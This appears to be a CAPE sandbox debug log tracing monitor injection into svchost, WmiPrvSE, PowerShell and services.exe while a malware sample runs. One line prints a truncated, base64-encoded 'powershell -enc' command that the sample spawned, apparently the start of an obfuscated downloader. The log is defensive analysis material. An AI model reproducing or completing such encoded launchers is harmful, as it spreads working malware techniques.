2019-05-14 15:42:42,336 [root] DEBUG: Loader: Injecting process 1732 (thread 0) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:42,336 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2680, handle 0x84
2019-05-14 15:42:42,539 [root] DEBUG: Process image base: 0x00000000FF8E0000
2019-05-14 15:42:42,539 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2019-05-14 15:42:42,601 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2019-05-14 15:42:42,742 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:42:42,944 [root] DEBUG: Process dumps enabled.
2019-05-14 15:42:43,069 [root] INFO: Disabling sleep skipping.
2019-05-14 15:42:43,069 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:42:43,226 [root] WARNING: Unable to hook LockResource
2019-05-14 15:42:43,242 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1732 at 0x0000000074260000, image base 0x00000000FF8E0000, stack from 0x0000000001686000-0x0000000001690000
2019-05-14 15:42:43,413 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k netsvcs.
2019-05-14 15:42:43,413 [root] INFO: Added new process to list with pid: 1732
2019-05-14 15:42:43,413 [root] INFO: Monitor successfully loaded in process with pid 1732.
2019-05-14 15:42:43,615 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-14 15:42:43,756 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-14 15:42:43,959 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:42:44,473 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-05-14 15:42:46,283 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\system32\wbem\wbemprox (0xa000 bytes).
2019-05-14 15:42:46,361 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\wbem\wmiutils (0x17000 bytes).
2019-05-14 15:42:47,407 [root] DEBUG: DLL loaded at 0x000007FEFA3E0000: C:\Windows\system32\VSSAPI (0x1b0000 bytes).
2019-05-14 15:42:47,407 [root] DEBUG: DLL loaded at 0x000007FEFB3B0000: C:\Windows\system32\ATL (0x19000 bytes).
2019-05-14 15:42:47,578 [root] DEBUG: DLL loaded at 0x000007FEFA3A0000: C:\Windows\system32\VssTrace (0x17000 bytes).
2019-05-14 15:42:47,594 [root] DEBUG: DLL loaded at 0x000007FEFAA30000: C:\Windows\system32\samcli (0x14000 bytes).
2019-05-14 15:42:47,687 [root] DEBUG: DLL loaded at 0x000007FEFBA90000: C:\Windows\system32\SAMLIB (0x1d000 bytes).
2019-05-14 15:42:47,766 [root] DEBUG: DLL loaded at 0x000007FEFAE90000: C:\Windows\system32\netutils (0xc000 bytes).
2019-05-14 15:42:47,937 [root] DEBUG: DLL loaded at 0x000007FEFB340000: C:\Windows\system32\es (0x67000 bytes).
2019-05-14 15:42:49,045 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF2C10000 to caller regions list (ntdll::NtDuplicateObject).
2019-05-14 15:42:49,247 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF86E0000 to caller regions list (ntdll::NtDuplicateObject).
2019-05-14 15:42:49,247 [root] DEBUG: DLL unloaded from 0x000007FEF59C0000.
2019-05-14 15:42:49,388 [root] DEBUG: DLL unloaded from 0x000007FEFA5F0000.
2019-05-14 15:42:49,388 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA5F0000 to caller regions list (ntdll::NtClose).
2019-05-14 15:42:49,528 [root] DEBUG: DLL unloaded from 0x000007FEFBAB0000.
2019-05-14 15:42:49,528 [root] DEBUG: DLL unloaded from 0x000007FEF9740000.
2019-05-14 15:42:49,730 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9740000 to caller regions list (ntdll::NtFreeVirtualMemory).
2019-05-14 15:42:49,730 [root] DEBUG: DLL unloaded from 0x000007FEF9C60000.
2019-05-14 15:42:49,934 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF9C60000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-05-14 15:42:49,934 [root] DEBUG: DLL unloaded from 0x000007FEF96B0000.
2019-05-14 15:42:50,137 [root] DEBUG: DLL unloaded from 0x000007FEFA1D0000.
2019-05-14 15:42:50,339 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA1D0000 to caller regions list (ntdll::NtClose).
2019-05-14 15:42:50,339 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA100000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-05-14 15:42:50,433 [root] DEBUG: DLL loaded at 0x000007FEFBAE0000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2019-05-14 15:42:50,994 [root] DEBUG: DLL loaded at 0x000007FEF9840000: C:\Windows\system32\wbem\wbemcore (0x12f000 bytes).
2019-05-14 15:42:50,994 [root] DEBUG: DLL loaded at 0x000007FEF97D0000: C:\Windows\system32\wbem\esscli (0x6f000 bytes).
2019-05-14 15:42:51,181 [root] DEBUG: DLL loaded at 0x000007FEF9C60000: C:\Windows\system32\wbem\FastProx (0xe2000 bytes).
2019-05-14 15:42:51,181 [root] DEBUG: DLL loaded at 0x000007FEF9BE0000: C:\Windows\system32\NTDSAPI (0x27000 bytes).
2019-05-14 15:42:51,525 [root] DEBUG: DLL unloaded from 0x000007FEF9840000.
2019-05-14 15:42:51,525 [root] DEBUG: DLL loaded at 0x000007FEF96B0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-05-14 15:42:51,602 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\wbem\wbemsvc (0xf000 bytes).
2019-05-14 15:42:51,946 [root] DEBUG: DLL loaded at 0x74560000: C:\Windows\system32\wbem\fastprox (0x96000 bytes).
2019-05-14 15:42:52,055 [root] DEBUG: DLL loaded at 0x74540000: C:\Windows\system32\NTDSAPI (0x18000 bytes).
2019-05-14 15:42:52,071 [root] DEBUG: DLL loaded at 0x000007FEFCD30000: C:\Windows\system32\authZ (0x2f000 bytes).
2019-05-14 15:42:52,382 [root] DEBUG: DLL loaded at 0x000007FEFA5B0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-05-14 15:42:52,398 [root] DEBUG: DLL loaded at 0x000007FEF99A0000: C:\Windows\system32\wbem\repdrvfs (0x73000 bytes).
2019-05-14 15:42:52,585 [root] WARNING: File at path "C:\Windows\sysnative\wbem\repository\WRITABLE.TST" does not exist, skip.
2019-05-14 15:42:52,585 [root] DEBUG: DLL loaded at 0x000007FEFCD70000: C:\Windows\system32\Wevtapi (0x6d000 bytes).
2019-05-14 15:42:53,772 [root] DEBUG: DLL unloaded from 0x000007FEFCD70000.
2019-05-14 15:42:53,959 [root] DEBUG: DLL loaded at 0x000007FEF8380000: C:\Windows\system32\wbem\wmiprvsd (0xbc000 bytes).
2019-05-14 15:42:54,161 [root] DEBUG: DLL loaded at 0x000007FEF8360000: C:\Windows\system32\NCObjAPI (0x16000 bytes).
2019-05-14 15:42:54,193 [root] DEBUG: DLL loaded at 0x000007FEF9E00000: C:\Windows\system32\wbem\wbemess (0x7e000 bytes).
2019-05-14 15:42:54,926 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2019-05-14 15:42:58,982 [root] DEBUG: DLL loaded at 0x000007FEFBAC0000: C:\Windows\system32\wbem\ncprov (0x16000 bytes).
2019-05-14 15:42:58,982 [root] DEBUG: DLL unloaded from 0x000007FEF9840000.
2019-05-14 15:43:01,664 [root] DEBUG: DLL unloaded from 0x000007FEFDF10000.
2019-05-14 15:43:01,664 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 1444
2019-05-14 15:43:01,664 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:43:01,680 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:43:01,680 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:43:02,085 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:43:02,101 [root] DEBUG: Loader: Injecting process 1444 (thread 2160) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:02,289 [root] DEBUG: Process image base: 0x00000000FF3B0000
2019-05-14 15:43:02,305 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:02,414 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF40F000 - 0x000007FEFF6A0000
2019-05-14 15:43:02,444 [root] DEBUG: InjectDllViaIAT: Allocated 0x238 bytes for new import table at 0x00000000FF410000.
2019-05-14 15:43:02,617 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:43:02,648 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:02,648 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1444
2019-05-14 15:43:02,788 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:43:02,835 [root] DEBUG: Process dumps enabled.
2019-05-14 15:43:03,022 [root] INFO: Disabling sleep skipping.
2019-05-14 15:43:03,177 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:43:03,224 [root] WARNING: Unable to hook LockResource
2019-05-14 15:43:03,272 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:43:03,272 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 1444 at 0x0000000074260000, image base 0x00000000FF3B0000, stack from 0x00000000000B0000-0x00000000000C0000
2019-05-14 15:43:03,474 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -secured -Embedding.
2019-05-14 15:43:03,506 [root] INFO: Added new process to list with pid: 1444
2019-05-14 15:43:03,506 [root] INFO: Monitor successfully loaded in process with pid 1444.
2019-05-14 15:43:03,802 [root] DEBUG: DLL loaded at 0x000007FEFD1C0000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-05-14 15:43:03,943 [root] DEBUG: DLL loaded at 0x000007FEFC400000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-05-14 15:43:04,161 [root] DEBUG: DLL loaded at 0x000007FEFE1F0000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-05-14 15:43:04,862 [root] DEBUG: DLL loaded at 0x000007FEFE640000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-05-14 15:43:05,283 [root] DEBUG: DLL loaded at 0x000007FEFA1D0000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-05-14 15:43:05,424 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-05-14 15:43:05,611 [root] DEBUG: DLL loaded at 0x000007FEFC860000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-05-14 15:43:05,628 [root] DEBUG: DLL loaded at 0x000007FEFD270000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-05-14 15:43:06,595 [root] DEBUG: DLL loaded at 0x000007FEF96B0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-05-14 15:43:26,141 [root] DEBUG: DLL unloaded from 0x000007FEFDF10000.
2019-05-14 15:43:26,500 [root] DEBUG: DLL loaded at 0x000007FEFA5B0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-05-14 15:43:27,858 [root] DEBUG: DLL unloaded from 0x000007FEFE710000.
2019-05-14 15:43:31,648 [root] DEBUG: DLL loaded at 0x000007FEF3560000: C:\Windows\system32\wbem\cimwin32 (0x1fa000 bytes).
2019-05-14 15:43:31,680 [root] DEBUG: DLL loaded at 0x000007FEF3E10000: C:\Windows\system32\framedynos (0x4c000 bytes).
2019-05-14 15:43:31,851 [root] DEBUG: DLL loaded at 0x000007FEFB2A0000: C:\Windows\system32\WTSAPI32 (0x11000 bytes).
2019-05-14 15:43:33,582 [root] DEBUG: DLL loaded at 0x000007FEFC610000: C:\Windows\system32\userenv (0x1e000 bytes).
2019-05-14 15:43:33,910 [root] DEBUG: DLL loaded at 0x000007FEFD290000: C:\Windows\system32\profapi (0xf000 bytes).
2019-05-14 15:43:35,984 [root] DEBUG: DLL loaded at 0x000007FEFD160000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-05-14 15:43:36,078 [root] INFO: Announced 64-bit process name: powershell.exe pid: 308
2019-05-14 15:43:36,078 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-14 15:43:36,266 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:43:36,266 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:43:36,625 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:43:36,921 [root] DEBUG: Loader: Injecting process 308 (thread 1992) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:36,921 [root] DEBUG: Process image base: 0x000000013FAE0000
2019-05-14 15:43:37,062 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:37,140 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013FB57000 - 0x000007FEFF6A0000
2019-05-14 15:43:37,201 [root] DEBUG: InjectDllViaIAT: Allocated 0x22c bytes for new import table at 0x000000013FB60000.
2019-05-14 15:43:37,358 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-14 15:43:37,497 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:37,717 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 308
2019-05-14 15:43:37,857 [root] DEBUG: DLL unloaded from 0x000007FEFD970000.
2019-05-14 15:43:38,388 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:43:38,528 [root] DEBUG: Process dumps enabled.
2019-05-14 15:43:38,589 [root] INFO: Disabling sleep skipping.
2019-05-14 15:43:38,792 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:43:38,855 [root] WARNING: Unable to hook LockResource
2019-05-14 15:43:39,042 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-05-14 15:43:39,385 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 308 at 0x0000000074260000, image base 0x000000013FAE0000, stack from 0x0000000000285000-0x0000000000290000
2019-05-14 15:43:39,572 [root] DEBUG: Commandline: C:\Windows\sysnative\powershell -enc JABjADYANwA5ADQANQA3ADYAPQAnAE0ANwA4ADgANwAwADIAMwAnADsAJABhADYAMAA4ADkAMAA2ACAAPQAgACcANQAzADEAJwA7ACQAUAA2ADcAMAA1ADQANwA9ACcAaAAxADEAMwAyADAAMAAnADsAJABJADMANwA1ADQANAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAB
2019-05-14 15:43:39,681 [root] INFO: Added new process to list with pid: 308
2019-05-14 15:43:39,759 [root] INFO: Monitor successfully loaded in process with pid 308.
2019-05-14 15:43:40,197 [root] DEBUG: DLL loaded at 0x000007FEFD1C0000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-05-14 15:43:40,338 [root] DEBUG: DLL loaded at 0x000007FEFE640000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-05-14 15:43:40,400 [root] DEBUG: DLL loaded at 0x000007FEFE710000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-05-14 15:43:40,477 [root] DEBUG: DLL loaded at 0x000007FEFC610000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-05-14 15:43:40,555 [root] DEBUG: DLL loaded at 0x000007FEFD290000: C:\Windows\system32\profapi (0xf000 bytes).
2019-05-14 15:43:40,634 [root] DEBUG: DLL loaded at 0x000007FEFBD70000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-05-14 15:43:40,743 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-05-14 15:43:40,851 [root] DEBUG: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-05-14 15:43:40,976 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-05-14 15:43:41,132 [root] DEBUG: DLL loaded at 0x000007FEFBAE0000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-05-14 15:43:41,257 [root] DEBUG: DLL loaded at 0x000007FEFC400000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-05-14 15:43:41,335 [root] DEBUG: DLL loaded at 0x000007FEFE1F0000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-05-14 15:43:41,367 [root] DEBUG: DLL unloaded from 0x000007FEFE710000.
2019-05-14 15:43:42,444 [root] DEBUG: DLL loaded at 0x000007FEF7A60000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-05-14 15:43:42,506 [root] DEBUG: DLL loaded at 0x000007FEF8540000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-05-14 15:43:42,599 [root] DEBUG: DLL loaded at 0x000007FEFCDE0000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-05-14 15:43:42,927 [root] DEBUG: DLL loaded at 0x000007FEF8EC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-05-14 15:43:43,114 [root] DEBUG: DLL loaded at 0x000007FEFB320000: C:\Windows\system32\slc (0xb000 bytes).
2019-05-14 15:43:43,302 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-05-14 15:43:43,536 [root] DEBUG: DLL loaded at 0x000007FEFC860000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-05-14 15:43:44,533 [root] DEBUG: DLL loaded at 0x000007FEF7960000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-05-14 15:43:44,690 [root] DEBUG: DLL loaded at 0x000007FEF2270000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-05-14 15:43:44,815 [root] DEBUG: DLL loaded at 0x0000000074460000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-05-14 15:43:44,954 [root] DEBUG: DLL loaded at 0x000007FEF1390000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-05-14 15:43:45,157 [root] DEBUG: DLL unloaded from 0x000007FEFDF10000.
2019-05-14 15:43:45,423 [root] DEBUG: DLL loaded at 0x000007FEF0960000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-05-14 15:43:45,657 [root] DEBUG: DLL loaded at 0x000007FEF78A0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-05-14 15:43:45,984 [root] DEBUG: DLL loaded at 0x000007FEEFE00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-05-14 15:43:46,358 [root] DEBUG: DLL loaded at 0x000007FEFC430000: C:\Windows\system32\version (0xc000 bytes).
2019-05-14 15:43:46,858 [root] DEBUG: DLL loaded at 0x000007FEF3230000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-05-14 15:43:47,124 [root] DEBUG: DLL loaded at 0x000007FEF9A90000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-05-14 15:43:47,263 [root] DEBUG: DLL loaded at 0x000007FEFA960000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-05-14 15:43:47,450 [root] DEBUG: DLL loaded at 0x000007FEF5080000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-05-14 15:43:47,716 [root] DEBUG: DLL loaded at 0x000007FEF3A00000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-05-14 15:43:48,121 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-05-14 15:43:48,325 [root] DEBUG: DLL loaded at 0x000007FEF3010000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-05-14 15:43:48,589 [root] DEBUG: DLL loaded at 0x000007FEF2EF0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-05-14 15:43:48,917 [root] DEBUG: DLL loaded at 0x000007FEFA1E0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-05-14 15:43:49,509 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-05-14 15:43:49,713 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-05-14 15:43:49,822 [root] DEBUG: DLL unloaded from 0x000007FEFC610000.
2019-05-14 15:43:49,884 [root] DEBUG: DLL loaded at 0x000007FEEFC70000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-05-14 15:43:50,150 [root] DEBUG: DLL loaded at 0x000007FEEF5C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-05-14 15:43:50,180 [root] DEBUG: DLL loaded at 0x73D40000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-05-14 15:43:50,197 [root] DEBUG: DLL loaded at 0x000007FEEF450000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-05-14 15:43:50,243 [root] DEBUG: DLL loaded at 0x000007FEEF2B0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-05-14 15:43:50,243 [root] DEBUG: DLL unloaded from 0x77050000.
2019-05-14 15:43:50,352 [root] DEBUG: DLL loaded at 0x000007FEFBAB0000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-05-14 15:43:51,085 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-05-14 15:43:51,913 [root] INFO: Announced 32-bit process name:  pid: 1
2019-05-14 15:43:51,913 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-05-14 15:43:52,006 [root] INFO: Announced 32-bit process name:  pid: 1
2019-05-14 15:43:52,006 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-05-14 15:43:52,052 [root] INFO: Announced 32-bit process name:  pid: 1
2019-05-14 15:43:52,052 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-05-14 15:43:52,069 [root] DEBUG: DLL unloaded from 0x74120000.
2019-05-14 15:43:52,099 [root] DEBUG: DLL unloaded from 0x751E0000.
2019-05-14 15:43:52,209 [root] DEBUG: DLL loaded at 0x000007FEEEA60000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-05-14 15:43:52,240 [root] INFO: Announced starting service "osppsvc"
2019-05-14 15:43:52,272 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-05-14 15:43:52,272 [root] DEBUG: DLL loaded at 0x000000001D000000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-05-14 15:43:52,286 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-14 15:43:52,334 [root] DEBUG: DLL loaded at 0x000007FEFDE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-05-14 15:43:52,349 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-14 15:43:52,365 [lib.api.process] INFO: 64-bit DLL to inject is C:\tcjnwjnzzp\dll\XgmKYpN.dll, loader C:\tcjnwjnzzp\bin\UCNgMgBu.exe
2019-05-14 15:43:52,365 [root] DEBUG: DLL loaded at 0x000007FEFDF00000: C:\Windows\system32\NSI (0x8000 bytes).
2019-05-14 15:43:52,411 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-05-14 15:43:52,520 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\OcFYdy.
2019-05-14 15:43:52,568 [root] DEBUG: DLL loaded at 0x000007FEFD370000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-05-14 15:43:52,584 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:52,598 [root] DEBUG: DLL loaded at 0x72E30000: C:\Windows\system32\WindowsCodecs (0xfb000 bytes).
2019-05-14 15:43:52,630 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-05-14 15:43:52,707 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-14 15:43:52,786 [root] DEBUG: Process dumps enabled.
2019-05-14 15:43:52,832 [root] INFO: Disabling sleep skipping.
2019-05-14 15:43:52,880 [root] WARNING: Unable to place hook on LockResource
2019-05-14 15:43:52,941 [root] WARNING: Unable to hook LockResource
2019-05-14 15:43:52,941 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000074260000, image base 0x00000000FFAB0000, stack from 0x00000000010C6000-0x00000000010D0000
2019-05-14 15:43:53,019 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-05-14 15:43:53,098 [root] INFO: Added new process to list with pid: 460
2019-05-14 15:43:53,176 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-05-14 15:43:53,223 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00270000 to caller regions list (advapi32::RegOpenKeyExW).
2019-05-14 15:43:53,269 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-14 15:43:53,301 [root] DEBUG: DLL loaded at 0x000007FEEE910000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni (0x143000 bytes).
2019-05-14 15:43:53,364 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-14 15:43:53,441 [root] DEBUG: Successfully injected DLL C:\tcjnwjnzzp\dll\XgmKYpN.dll.
2019-05-14 15:43:53,598 [root] DEBUG: DLL loaded at 0x000007FEF5750000: C:\Windows\system32\rasapi32 (0x62000 bytes).
2019-05-14 15:43:53,660 [root] DEBUG: DLL loaded at 0x000007FEF5730000: C:\Windows\system32\rasman (0x1c000 bytes).
2019-05-14 15:43:53,737 [root] DEBUG: DLL loaded at 0x000007FEFA810000: C:\Windows\system32\rtutils (0x11000 bytes).
2019-05-14 15:43:54,096 [root] DEBUG: DLL loaded at 0x000007FEFCB00000: C:\Windows\system32\mswsock (0x55000 bytes).
2019-05-14 15:43:54,174 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2019-05-14 15:43:54,253 [root] DEBUG: DLL loaded at 0x000007FEFCAF0000: C:\Windows\System32\wship6 (0x7000 bytes).
2019-05-14 15:43:54,392 [root] DEBUG: DLL unloaded from 0x6A620000.
2019-05-14 15:43:54,456 [root] DEBUG: DLL unloaded from 0x000007FEF5730000.
2019-05-14 15:43:54,456 [root] DEBUG: DLL loaded at 0x000007FEF4350000: C:\Windows\system32\winhttp (0x71000 bytes).
2019-05-14 15:43:54,579 [root] DEBUG: DLL unloaded from 0x000007FEF9A40000.
2019-05-14 15:43:54,579 [root] DEBUG: DLL loaded at 0x000007FEF4240000: C:\Windows\system32\webio (0x64000 bytes).
